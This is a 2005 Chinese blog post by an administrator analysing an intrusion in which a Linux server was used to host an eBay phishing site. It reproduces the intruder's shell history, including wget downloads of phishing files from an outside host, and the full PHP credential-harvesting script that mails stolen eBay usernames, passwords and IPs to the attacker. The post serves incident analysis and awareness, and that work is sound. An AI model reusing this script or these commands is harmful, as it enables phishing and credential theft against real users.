Chinaunix首页 | 论坛 | 博客
  • 博客访问: 1389353
  • 博文数量: 140
  • 博客积分: 8518
  • 博客等级: 中将
  • 技术积分: 1822
  • 用 户 组: 普通用户
  • 注册时间: 2005-03-01 22:23
个人简介

嘿嘿!

文章分类
文章存档

2016年(2)

2015年(5)

2014年(6)

2013年(11)

2012年(11)

2011年(3)

2010年(4)

2009年(4)

2008年(8)

2007年(23)

2006年(26)

2005年(37)

分类: 网络与安全

2005-11-28 11:19:04

从我公司的Linux服务器找到如下信息

cd ..
ls
mkdir " "
ls
ls -alF
cd " "
ls
mkdir ebay
ls
cde ebay
cd ebay
wget free-ftp.org/drx/ebay/index.html
wget 80.190.243.71/drx/ebay/index.html
wget 80.190.243.71/drx/index.html
wget 80.190.243.71/drx/contact.php
vim contact.php

早上上班的时候,发现服务器密码被改了。预感被入侵了

果然被入侵了。通过查找历史命令,找到一些蛛丝马迹

该入侵者无非就是想通过我的服务器做个Ebay的傀儡网站

在 /var/ww/html/建立了一个 " "的目录

然后把ebay的钓鱼网站指向我这这边的目录

等我到继续查的时候,发现这家伙已经抹去了痕迹,把目录给擦除了

呵呵

我查看了该contact.php,从php的分析看到如下内容。很有意思的脚本

if ($_SERVER['REQUEST_METHOD'] == 'POST') {
$userid = $_POST['userid'];   把用户名称记录下来
$pass = $_POST['pass'];        把密码记录下来
} else {
$userid = $_GET['userid'];
$pass = $_GET['pass'];
}

$myemail = "";    自动发到这个鸟人的邮箱
$subject = "USER: $userid PASS: $pass eBay";    把用户名称跟密码,好可爱!
$ipa = getenv('REMOTE_ADDR');
$dta = date("j.m.Y, G:ia", strtotime("+3 hours"));
$message = "
Ebay User Id:        $userid
User Id Pass:        $pass
Date/time:           $dta
IP:                  $ipa
";
if($UserIDgol != $userid || $passgol != $pass) {
mail($myemail, $subject, $message);
header("Location: =
1&bshowgif=0&favoritenav=&ru=http%3A%2F%2Fcontact.ebay.com%3A80%2Fws%2FeBayISAPI.dll%3FReturnUserEmail%26contactsubmit%3DContact%2BM
ember%26MfcISAPICommand%3DReturnUserEmail%26frm%3D279%26iid%3D-1%26requested%3Dalimotawww%26redirect%3D0%26de%3Doff&pp=&errmsg=8");
}
?>

小伙子还是太嫩了。从/var/www/secure看到还是美国来的客人!下次搞个新的蜜罐服务器给他玩。

BTW:别下载下来干坏事哦!:P

阅读(3000) | 评论(0) | 转发(1) |
给主人留下些什么吧!~~